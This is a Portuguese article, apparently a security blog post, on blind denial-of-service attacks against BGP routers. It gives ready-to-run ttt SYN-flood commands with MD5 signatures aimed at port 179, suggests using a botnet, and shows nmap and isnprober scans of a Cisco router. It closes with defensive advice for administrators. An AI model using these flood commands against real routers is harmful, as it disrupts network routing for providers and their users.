Ataques DoS cegos em roteadores BGP.
Chamaremos de Cegos aqueles ataques que não requerem nenhum conhecimento adicional além do endereço IP do roteador BGP. O cenário mais simples para tal ataque DoS é o SYN flood na porta TCP 179. Para realizar tal ataque em um roteador Industrial, você precisa usar várias dezenas de computadores, ou melhor, uma botnet.
Uma maneira mais interessante de" inundar " um roteador BGP de destino usando autenticação MD5 é usar pacotes TCP SYN com assinaturas MD5. Esse ataque adiciona carga computacional ao processamento do MD5 pelo roteador atacado.
Esse ataque é fácil de realizar usando o utilitário ttt com a opção md5. Para otimizar a inundação, várias instâncias do ttt devem ser executadas em várias dezenas de máquinas.
Aqui está um exemplo de Uso do ttt:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5
allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y
179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
Falando sobre o hardware da Cisco Systems, deve-se mencionar a possibilidade de implementar ataques de estouro de pilha TCP/IP do IOS. Para identificar essas vulnerabilidades, você pode usar scanners de vulnerabilidade, como Nmap, hping2 e isnprober.
Aqui está um exemplo para um roteador Cisco 2600:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: class="truly" random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port ISN Delta
192.168.66.202:23 -1154503313
192.168.66.202:23 -24125463 1130377850
192.168.66.202:23 2031059534 2055184997
192.168.66.202:23 965205234 -1065854300
192.168.66.202:23 -1974685094 -2939890328
192.168.66.202:23 1760147902 3734832996
192.168.66.202:23 2089287258 329139356
192.168.66.202:23 -923724721 -3013011979
192.168.66.202:23 -934490140 -10765419
192.168.66.202:23 -1262713275 -328223135
Em geral, o protocolo de roteamento BGP versão 4 é parte integrante da Internet moderna, e, portanto, os problemas no funcionamento deste protocolo certamente afetarão o funcionamento da rede global. Portanto, se as responsabilidades de um administrador de Sistema incluem a manutenção de roteadores que trabalham com BGP (como regra, estas são empresas de Provedores), é necessário levar a sério as possíveis ameaças e tomar medidas para protegê-las com antecedência.
Petukhov Oleg, advogado de Direito Internacional e proteção de dados pessoais, especialista em informação segurança, proteção de informações e dados pessoais.
Canal do Telegram: https://t.me/protecaodaInformacao
Grupo em Telegram: https://t.me/protecaodaInformacao1
Site: https://legascom.ru
Correio eletrónico: online@legascom.ru
#segurançadaInformação #Segurançadainformação




